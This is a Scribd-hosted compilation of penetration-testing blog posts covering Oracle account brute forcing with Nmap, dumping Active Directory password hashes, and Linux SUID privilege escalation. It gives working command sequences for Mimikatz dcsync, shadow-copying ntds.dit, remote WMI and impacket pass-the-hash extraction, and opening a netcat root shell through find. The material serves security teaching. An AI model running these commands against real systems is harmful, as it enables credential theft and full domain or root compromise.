KEMBAR78
Oracle Database Penetration Testing | PDF | Superuser | Windows Registry
0% found this document useful (0 votes)
137 views40 pages

Oracle Database Penetration Testing

This document discusses various techniques for dumping password hashes from an Oracle database using Nmap scripts and tools. It explains that Nmap contains two scripts, oracle-sid-brute and oracle-brute, that can be used to brute force Oracle SIDs and accounts. Running these scripts along with the identified SID allows discovering valid Oracle database accounts. However, it notes that the oracle-brute script does not prevent account lockouts from excessive failed login attempts.

Uploaded by

Steven Conley
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
137 views40 pages

Oracle Database Penetration Testing

This document discusses various techniques for dumping password hashes from an Oracle database using Nmap scripts and tools. It explains that Nmap contains two scripts, oracle-sid-brute and oracle-brute, that can be used to brute force Oracle SIDs and accounts. Running these scripts along with the identified SID allows discovering valid Oracle database accounts. However, it notes that the oracle-brute script does not prevent account lockouts from excessive failed login attempts.

Uploaded by

Steven Conley
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 40

Discovering Oracle Accounts With Nmap

If we are conducting an infrastructure penetration test and we have discover an Oracle database
during the information gathering stage then we can use Nmap to perform some checks that will
help us to obtain potentially the accounts that exists on the database. These checks can be
executed with two scripts that Nmap contains in his scripting engine.Specifically the scripts that
we will need to use are the following:

 oracle-sid-brute
 oracle-brute

Oracle databases are running on port 1521 so in most of the cases we can identify them just by
checking if this port is open on our target host.The next step is to use the script oracle-sid-brute
which will try to brute force common oracle SID’s.The next image is showing the use of this
script and that has successfully identified that the SID is XE.

Brute Forcing
Oracle SID’s – Nmap

Now that we know the SID of the Oracle database we can use the oracle-brute script to discover
the valid accounts.by specifying the SID name
Discovering Oracle Accounts

Conclusion

With these two scripts we can perform security audits against an Oracle database with
Nmap.However the drawback as the above image indicates is that we can lock the accounts as
the script doesn’t have a check about the number of tries that will execute in order to prevent the
account lockout.From the other hand it is a very fast approach for detecting oracle accounts
through Nmap during the information gathering.

Search Topic

Follow PenTest Lab

Enter your email address to follow this blog and receive notifications of new posts by email.

Join 2,203 other followers

Email Address:

Recent Posts

 Lateral Movement – Services


 Indirect Command Execution
 Spyse – A Cyber Security Search Engine
 Persistence – COM Hijacking
 Persistence – DLL Hijacking

Categories

 Coding (10)
 Exploitation Techniques (19)
 External Submissions (3)
 General Lab Notes (22)
 Information Gathering (12)
 Infrastructure (2)
 Maintaining Access (4)
 Mobile Pentesting (7)
 Network Mapping (1)
 Post Exploitation (13)
 Privilege Escalation (14)
 Red Team (84)
o Credential Access (2)
o Defense Evasion (22)
o Lateral Movement (1)
o Persistence (24)
 Social Engineering (11)
 Tools (7)
 VoIP (4)
 Web Application (14)
 Wireless (2)

@ Twitter

 RT @netbiosX: My favourite website about law! tsava.law #law #lawyer #Lawyers


18 hours ago
 Bad Outlook - A simple PoC which leverages the Outlook Application Interface (COM
Interface) to execute shellcode o… twitter.com/i/web/status/1… 23 hours ago
 @bohops you cannot imagine how much time consuming is the creation of video
content+editing even for 2-3 minutes videos 1 day ago
 Lsass Memory Dumps are Stealthier than Ever Before deepinstinct.com/2021/02/16/lsa…
1 day ago
 LsassSilentProcessExit - Command line interface to dump LSASS memory to disk via
SilentProcessExit github.com/deepinstinct/L… 1 day ago

Follow @netbiosX

Pentest Laboratories Discord


June 24, 2012

Nmap Script to Screenshot Web Services


One common situation when conducting a penetration test in web servers and especially in non
production systems is the fact that you can discover many services that are not even running a
web application.In order to address this problem and to look only the specific services that are
running applications Trustwave SpiderLabs have created a Nmap script which allows you to take
a screenshot of the running web services.

This script depends on the wkhtmltoimage tool in order to work efficiency.So the first step is to
download it,extract it and copy it on the /usr/local/bin folder.In order to achieve that we need to
execute the following command from our terminal.

wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-
i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/

Now it is time to download the http-screenshot script and place it on the following path where all
the nmap scripts are located.

/usr/local/share/nmap/scripts/

This script will call for the wkhtmltoimage executable in order to take the screenshot.So it is
basically integrates this tool inside the nmap.

http-screenshot script – code

Now its time to run the command nmap –script-updatedb in order to update our nmap script
engine with the new script.

If we want to test this script all we have to do is to call the script in our nmap scans.For example:
http-screenshot script in
use

As you can see from the example it saves the image with the IP of the host and with the port that
the service is running.Lets see the saved screenshot:

Screenshot of a web application from Nmap

Conclusion

Nmap has a very powerful script engine that allows you to discover additional information
regarding the hosts that you are scanning.Basically this script uses the tool wkhtmltoimage in
order to perform the job but from the script engine of nmap making the scans of web services
more effective.With this script that Trustwave SpiderLabs have created,you can have an idea of
which services are worth looking for your penetration test from the moment of your scan
reducing the time that you have to spend by examining every web service separately.

July 4, 2018

Dumping Domain Password Hashes


It is very common during penetration tests where domain administrator access has been achieved
to extract the password hashes of all the domain users for offline cracking and analysis. These
hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional
information like group memberships and users.

The NTDS.DIT file is constantly in use by the operating system and therefore cannot be copied
directly to another location for extraction of information. This file can be found in the following
Windows location:

1C:\Windows\NTDS\NTDS.dit

There are various techniques that can be used to extract this file or the information that is stored
inside it however the majority of them are using one of these methods:

1. Domain Controller Replication Services


2. Native Windows Binaries
3. WMI

Mimikatz
Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to
retrieve the password hashes from the NTDS.DIT file. This technique eliminates the need to
authenticate directly with the domain controller as it can be executed from any system that is part
of the domain from the context of domain administrator. Therefore it is the standard technique
for red teams as it is less noisy.

1lsadump::dcsync /domain:pentestlab.local /all /csv


Mimikatz – Dump Domain Hashes via DCSync

By specifying the domain username with the /user parameter Mimikatz can dump all the account
information of this particular user including his password hash.

1lsadump::dcsync /domain:pentestlab.local /user:test


Mimikatz – Dump User Hash via DCSync

Alternatively executing Mimikatz directly in the domain controller password hashes can be
dumped via the lsass.exe process.

1privilege::debug
2lsadump::lsa /inject
Mimikatz – Dump Domain Hashes via lsass

The password hashes of the domain users will retrieved.


Mimikatz – Dump domain hashes via lsadump

Empire
PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack.
Both modules needs to be executed from the perspective of domain administrator and they are
using Microsoft replication services. These modules rely on the Invoke-Mimikatz PowerShell
script in order to execute Mimikatz commands related to DCSync. The following module will
extract the domain hashes to a format similar to the output of Metasploit hashdump command.

1usemodule credentials/mimikatz/dcsync_hashdump
Empire – DCSync Hashdump Module

The DCSync module requires a user to be specified in order to extract all the account
information.

Empire – DCSync Module

The following information will obtained:


Empire – DCSync Account Information

Nishang
Nishang is a PowerShell framework which enables red teamers and penetration testers to
perform offensive operations against systems. The Copy-VSS script can be used to automatically
extract the required files: NTDS.DIT, SAM and SYSTEM. The files will be extracted into the
current working directory or into any other folder that will specified.

1Import-Module .\Copy-VSS.ps1
2Copy-VSS
3Copy-VSS -DestinationDir C:\ShadowCopy\

Nishang – Extract NTDS PowerShell


Alternatively the script can be executed from an existing Meterpreter session by loading the
PowerShell extension.

1load powershell
2powershell_import /root/Copy-VSS.ps1
3powershell_execute Copy-VSS

It is also possible to establish a direct PowerShell session with the command powershell_shell in
order to extract the files once the script has been imported to the existing Meterpreter session.

1Copy-VSS
2Copy-VSS -DestinationDir C:\Ninja

Nishang – Extract NTDS Meterpreter PowerShell

PowerSploit
PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to
create a new volume that could be used for extraction of files.

1Import-Module .\VolumeShadowCopyTools.ps1
2New-VolumeShadowCopy -Volume C:\
3Get-VolumeShadowCopy
PowerSploit – VolumeShadowCopyTools

Alternatively it can be executed from an existing Meterpreter session by loading the PowerShell
extension.

1powershell_shell
2New-VolumeShadowCopy -Volume C:\
3Get-VOlumeShadowCopy

PowerSploit – Volume Shadow Copy

Files can then copied from the new volume to a destination path with the command copy.

Invoke-DCSync
The Invoke–DCSync is a PowerShell script that was developed by Nick Landers and leverages
PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz to retrieve hashes
with the Mimikatz method of DCSync. Executing directly the function will generate the
following output:

1Invoke-DCSync

Invoke-DCSync – PowerShell
The results will be formatted into four tables: Domain, User, RID and Hash. However executing
the Invoke-DCSync with the parameter -PWDumpFormat will retrieve the hashes in the
format: user:id:lm:ntlm:::

1Invoke-DCSync -PWDumpFormat

Invoke-DCSync – PowerShell PWDump Format

The same output can be achieved by running the script from an existing Meterpreter session.

Invoke-DCSync Metasploit

With the PWDumpFormat:

Invoke-DCSync – Metasploit PWDump Format

ntdsutil
The ntdsutil is a command line tool that is part of the domain controller ecosystem and its
purpose is to enable administrators to access and manage the windows Active Directory
database. However it can be abused by penetration testers and red teams to take a snapshot of the
existing ntds.dit file which can be copied into a new location for offline analysis and extraction
of password hashes.
1ntdsutil
2activate instance ntds
3ifm
4create full C:\ntdsutil
5quit
quit
6

ntdsutil

Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be
saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry
folder.
ntdsutil – ntds

DiskShadow
DiskShadow is a Microsoft signed binary which is used to assist administrators with operations
related to the Volume Shadow Copy Service (VSS). Originally bohops wrote about this binary in
his blog. This binary has two modes interactive and script and therefore a script file can be used
that will contain all the necessary commands to automate the process of NTDS.DIT extraction.
The script file can contain the following lines in order to create a new volume shadow copy,
mount a new drive, execute the copy command and delete the volume shadow copy.

1
set context persistent nowriters
2add volume c: alias someAlias
3create
4expose %someAlias% z:
5exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
6delete shadows volume %someAlias%
reset
7

It should be noted that the DiskShadow binary needs to executed from the
C:\Windows\System32 path. If it is called from another path the script will not executed
correctly.

1diskshadow.exe /s c:\diskshadow.txt
DiskShadow

Running the following command directly from the interpreter will list all the available volume
shadow copies of the system.

1diskshadow
2LIST SHADOWS ALL
diskshadow – Retrieve Shadow Copies

The SYSTEM registry hive should be copied as well since it contains the key to decrypt the
contents of the NTDS file.

1reg.exe save hklm\system c:\exfil\system.bak

diskshadow – Copy system from Registry

WMI
Sean Metcalf demonstrated in his blog that it is possible to remotely extract the NTDS.DIT and
SYSTEM files via WMI. This technique is using the vssadmin binary to create the volume
shadow copy.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call


1create "cmd /c vssadmin create shadow /for=C: 2>&1"

WMI – Create Volume Shadow Copy

Then it executes the copy command remotely in order to extract the NTDS.DIT file from the
volume shadow copy into another directory on the target system.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call


create "cmd /c copy
1\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit
C:\temp\ntds.dit 2>&1"

WMI – Copy NTDS File

The same applies and for the SYSTEM file.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call


create "cmd /c copy
1\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTE
M\ C:\temp\SYSTEM.hive 2>&1"
WMI – Copy System File

The extracted files can then transferred from the domain controller into another Windows system
for dumping the domain password hashes.

1PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp


2PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

Transfer Files via Copy

Instead of credentials if a Golden ticket has been generated it can be used for authentication with
the domain controller via Kerberos.

vssadmin
The volume shadow copy is a Windows command line utility which enables administrators to
take backups of computers, volumes and files even if they are in use by the operating system.
Volume Shadow Copy is running as a service and requires the filesystem to be formatted as
NTFS which all the modern operating systems are by default. From a Windows command
prompt executing the following will create a snapshot of the C: drive in order files that are not
normally accessible by the user to be copied into another location (local folder, network folder or
removable media).

1vssadmin create shadow /for=C:


vssadmin – Create Volume Shadow Copy

Since all the files in the C: drive have been copied into another location
(HarddiskVolumeShadowCopy1) they are not directly used by the operating system and
therefore can be accessed and copied into another location. The command copy and will copy the
NTDS.DIT and SYSTEM files to a new created folder on the local drive named ShadowCopy.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit
1C:\ShadowCopy
copy
2\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTE
M C:\ShadowCopy

Copy Files from Volume Shadow Copy

These files needs to be copied from the domain controller into another host for further
processing.
ShadowCopy – Files

vssown
Similar to the vssadmin utility Tim Tomes developed vssown which is a visual basic script that
can create and delete volume shadow copies, run arbitrary executables from an unmounted
shadow copy and initiate and stop the volume shadow copy service.

1cscript vssown.vbs /start


2cscript vssown.vbs /create c
3cscript vssown.vbs /list
4cscript vssown.vbs /delete
vssown – Volume Shadow Copy

The required files can be copied with the command copy.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit
C:\vssown
1copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYST
2EM C:\vssown
3copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM
C:\vssown
vssown – Copy NTDS, SYSTEM and SAM Files

Metasploit
Metasploit framework has a module which authenticates directly with the domain controller via
the server message block (SMB) service, creates a volume shadow copy of the system drive and
download copies of the NTDS.DIT and SYSTEM hive into the Metasploit directories. These
files can be used with other tools like impacket that can perform extraction of active directory
password hashes.

1auxiliary/admin/smb/psexec_ntdsgrab
Metasploit – NTDS Module

There is also a post exploitation module which can be linked into an existing Meterpreter session
in order to retrieve domain hashes via the ntdsutil method.

1windows/gather/credentials/domain_hashdump
Alternatively if there is an existing Meterpreter session to the domain controller the command
hashdump can be used. However this method is not considered safe as it might crash the domain
controller.

1hashdump

Metasploit – Hashdump on DC

fgdump
The fgdump is an old executable file which can extract LanMan and NTLM password hashes. It
can be executed locally or remotely if local administrator credentials have been acquired. During
execution fgdump will attempt to disable the antivirus that might run on the system and if it is
successful will write all the data in two files. If there is an antivirus or an endpoint solution
fgdump should not be used as a method of dumping password hashes to avoid detection since it
is being flagged by most antivirus companies including Microsoft’s Windows Defender.

1fgdump.exe

fgdump – Domain Controller

The password hashes can be retrieved by examining the contents of the .pwdump file.

1type 127.0.0.1.pwdump
fgdump – pwdump File

NTDS Extraction
Impacket is a collection of python scripts that can be used to perform various tasks including
extraction of contents of the NTDS file. The impacket-secretsdump module requires the
SYSTEM and the NTDS database file.

1impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

impacket – Extract NTDS Contents

Furthermore impacket can dump the domain password hashes remotely from the NTDS.DIT file
by using the computer account and its hash for authentication.

impacket-secretsdump -hashes
1aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc
PENTESTLAB/dc\$@10.0.0.1
impacket – Extract NTDS Contents Remotely

As an alternative solution to impacket, NTDSDumpEx binary can extract the domain password
hashes from a Windows host.

1NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

NTDSDumpEx
There is also a shell script adXtract that can export the username and password hashes into a
format that can be used by common password crackers such as John the Ripper and Hashcat.

1./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab

adXtract

The script will write all the information into various files under the project name and when the
decryption of the database file NTDS is finished will export the list of users and password hashes
into the console. The script will provide extensive information regarding the domain users as it
can be demonstrated below.
adXtract – List of Users

The password hashes will be presented into the following format.


Search Topic

Follow PenTest Lab

Enter your email address to follow this blog and receive notifications of new posts by email.

Join 2,203 other followers

Email Address:

Recent Posts

 Lateral Movement – Services


 Indirect Command Execution
 Spyse – A Cyber Security Search Engine
 Persistence – COM Hijacking
 Persistence – DLL Hijacking

Categories

 Coding (10)
 Exploitation Techniques (19)
 External Submissions (3)
 General Lab Notes (22)
 Information Gathering (12)
 Infrastructure (2)
 Maintaining Access (4)
 Mobile Pentesting (7)
 Network Mapping (1)
 Post Exploitation (13)
 Privilege Escalation (14)
 Red Team (84)
o Credential Access (2)
o Defense Evasion (22)
o Lateral Movement (1)
o Persistence (24)
 Social Engineering (11)
 Tools (7)
 VoIP (4)
 Web Application (14)
 Wireless (2)

@ Twitter

 RT @netbiosX: My favourite website about law! tsava.law #law #lawyer #Lawyers


18 hours ago
 Bad Outlook - A simple PoC which leverages the Outlook Application Interface (COM
Interface) to execute shellcode o… twitter.com/i/web/status/1… 23 hours ago
 @bohops you cannot imagine how much time consuming is the creation of video
content+editing even for 2-3 minutes videos 1 day ago
 Lsass Memory Dumps are Stealthier than Ever Before deepinstinct.com/2021/02/16/lsa…
1 day ago
 LsassSilentProcessExit - Command line interface to dump LSASS memory to disk via
SilentProcessExit github.com/deepinstinct/L… 1 day ago

Follow @netbiosX

Pentest Laboratories Discord

 Discord

Pen Test Lab Stats

 5,096,656 hits

Facebook Page

Facebook Page
Blog at WordPress.com.
September 25, 2017

SUID Executables
SUID (Set User ID) is a type of permission which is given to a file and allows users to execute
the file with the permissions of its owner. There are plenty of reasons why a Linux binary can
have this type of permission set. For example the ping utility require root privileges in order to
open a network socket but it needs to be executed by standard users as well to verify connectivity
with other hosts.

However some of the existing binaries and utilities can be used to escalate privileges to root if
they have the SUID permission. Known Linux executables that can allow privilege escalation
are:

 Nmap
 Vim
 find
 Bash
 More
 Less
 Nano
 cp

The following commands can discover all the SUID executables that are running on the system.
More specifically the commands will try to find files in the / directory owned by the user root
that have the SUID permission bits, print them and then redirect all errors to /dev/null in order to
list only the binaries that the user has permissions to access.

1find / -user root -perm -4000 -print 2>/dev/null


2find / -perm -u=s -type f 2>/dev/null
3find / -user root -perm -4000 -exec ls -ldb {} \;
Discovery of SUID Executables

All of the binaries above will executed with root privileges since they contain the “s” in their
permissions and they are owned by the root user.

1ls -l /usr/bin/nmap
2-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

SUID
Executable – Nmap

Nmap
Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute
shell commands. Since Nmap is in the list of binaries that is executed with root privileges it is
possible to use the interactive console in order to run a shell with the same privileges.

1nmap -V
Nmap Version Identification

The interactive mode can start by executing Nmap with the parameter “interactive”

1nmap --interactive

Nmap –
Interactive Mode

The following command will give an elevated shell.

1nmap> !sh
2sh-3.2# whoami
3root

Root
Shell via Suid Nmap Binary

Alternatively there is a Metasploit module which performs privilege escalation via SUID Nmap
binaries.

1exploit/unix/local/setuid_nmap

Find
The utility find can be used to discover stored on the system. However it is the ability to execute
commands. Therefore if it is configured to run with the SUID permission all the commands that
will executed through find will be executed as root.

1touch pentestlab
2find pentestlab -exec whoami \;
Find
Command Execution

Since the majority of the Linux operating system have netcat installed it is possible to upgrade
the elevated command execution into a root shell.

1find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Run Netcat via Find

Connecting into the opened port will give a root shell.

1netcat 192.168.1.189 5555


2id
3cat /etc/shadow

Root Shell via Find

Vim
The main use of Vim is to be text editor. However if it runs as SUID it will inherit the
permission of the root user and therefore it could read all files on the system.

1vim.tiny /etc/shadow
Vim –
Reading Root Files

Further root activities can be done by running a shell through Vim.

1vim.tiny
2# Press ESC key
3:set shell=/bin/sh
4:shell

Vim – Root Shell

Bash
The following command will open a bash shell as root.
1bash -p
2bash-3.2# id
3uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Bash – Root Shell

Less
The utility Less can also execute an elevated shell. The same principle applies and for the More
command.

1less /etc/passwd
2!/bin/sh

Less – Root Shell

Conclusion
Performing privilege escalation by misconfigured SUID executables is trivial. Therefore
administrators should evaluate all the SUID binaries and whether they need to run with the
permissions of an elevated user. Particular focus should be given to applications with the ability
to execute code or write arbitrary data on the system.

You might also like